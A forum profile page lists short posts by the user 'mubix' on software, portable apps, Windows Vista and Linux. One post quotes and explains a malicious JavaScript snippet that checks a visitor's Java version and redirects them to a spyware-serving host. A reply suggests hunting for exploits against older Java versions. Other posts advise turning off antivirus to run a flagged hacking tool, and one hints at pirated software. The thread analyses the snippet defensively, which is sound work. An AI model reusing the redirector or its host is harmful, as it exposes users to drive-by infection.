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Everything posted by mubix

  1. paint sucks... sit down.. and Photoshop isn't free The GIMP! :D ... you suck...
  2. ktorrent is nice and it runs just fine on Gnome. uTorrent is awesome. You guys know me and small single executable apps.
  3. lol that's what I said... paint sucks... sit down..
  4. Instead of going to a specific folder, you can search the registry for where it is installed, and then point it there. That would work on more systems. Just a thought. My "main" drive is E: not C: :twisted: screws up a lot of spyware.
  5. yeah, that mubix guy knows his stuff. :twisted:
  6. Code explained: Initialize Javascript and declare variables: (no big deal) <script language='javascript'> var i,l,v; num = 3; This is the register entry for Internet Explorer for the Java component. Run regedit and do a search just for the alphanumerics in the brackets: s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}'; You should find it at: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupClsidFeature Uses a boolen test to verify that the Java component exists: l = testing.isComponentInstalled(s,'ComponentID'); Saves the whole value of the registry key to the value 'v': v = testing.getComponentVersion(s,'ComponentID'); Mine looked like this -> {08B0E5C0-4FCB-11CF-AAA5-00401C608500}!5,0,3200,0 This is where it starts checking for what it wants: Is the component installed? If yes, continue: if (l == true) { Split up the 'v' variable using the delimiter ",": x = v.split(','); If there is a version and it is less than 3810 then change "num" to 1; if ( (x[0]!=0) && (x[2]<3810) ) { num = 1; Send the user to a specific site based on the results and value of "num" c = 'http://www.abetterstart.com/c/2000/'+'counter21.php'+'?b='+num; window.location = c; So, people who are "vulnerable" would go to: http:/www.abetterstart.com/v/200/counter21.php?b=1 And those who aren't go to: http:/www.abetterstart.com/v/200/counter21.php?b=3 again, with the "/" taken out.
  7. If you can find out what version of Java 3810 is (3810 is the VM version) then we could start looking for what exploits work against versions lower that in:
  8. That isn't exploit code, it's just checking if Java is installed, a specific version and allowed. Then it hops you to the next site that infects your computer with spyware. Just ran it through a sandbox. I took your URL out as well. I don't want people clicking on it on accident. It's Vako's call if he wants it gone.
  9. I have taken one of the "/" out of your post until I can determine if this is spam, something else, or completely legit.
  10. Now that is damn useful. Thanks mate. I am the king of small useful apps
  11. I don't know if you guys know of a really great program, and again, don't know if it's already been covered: Universal Extractor. I use it instead of WinRar or 7Zip. It also extracts installer files. So I have used it to make a lot of Non-portable applications, portable.
  12. Biggest problem is that a lot of the commercial products don't follow such news and don't release updates, much less tell their consumers about them. **EDIT** found that, now I'm ok.
  13. UltraMon is a great tool, and I am sure you can "find" it somewhere. Also, if you don't change backgrounds that much you can just photoshop the two you want together.
  14. I have been following PortableApps.com since it only had one app on it. I am not fond of their new "Panel" I liked having the apps just extract and be ready. I also like using PStart. Their panel is way too big, bloated, and non customizable. However, you can't beat Portable (Firefox|Thunderbird|FileZilla|VLC)
  15. We are already doing live shows. We will be doing more.
  16. You can either tell your AV that it isn't a virus in it's "Exclude" configuration, or use a VMWare session without a AV installed, or turn off your AV. 3 options ;-)
  17. mubix


    /me enters explicative about Microsoft
  18. Avast! sees it as a "Hacker Tool" that is all. Most Anti viruses see Cain as such.
  19. This is quite the hot topic ATM in the underground traveling community. There are many ways to get it done. It would be an awesome segment to show you how ;-)
  20. Back in October I was listening to an indepth interview with the guys from Samba, I am not sure which podcast it was, but the Samba guys were livid with Vista. They were saying that now, instead of 8 or so packets to open a directory using windows networking, it is now in the 1000s and that they are working to get it working. Samba 3 will support it.
  21. actually you don't even have to do that much, dhclient eth0 is all you need. and you can put that in /etc/rc.local and be done with it.
  22. Completely untrue. Vista should work perfectly well on any decent computer made after 2003. Ok, I'm sorry, I am a minimalist, I don't think any spiffy clock is worth slowing the programs I actually use. Now, I could be completely wrong again and Vista could be faster. But I highly doubt it. For those of you who are reading this and don't know or have never used Vista. I have never used Vista so my claims are unbased except for in Microsoft experience.
  23. mubix

    Linux on ipod

    I put linux on my iPod video 30gb, it just wasn't worth it, so I switched it back.
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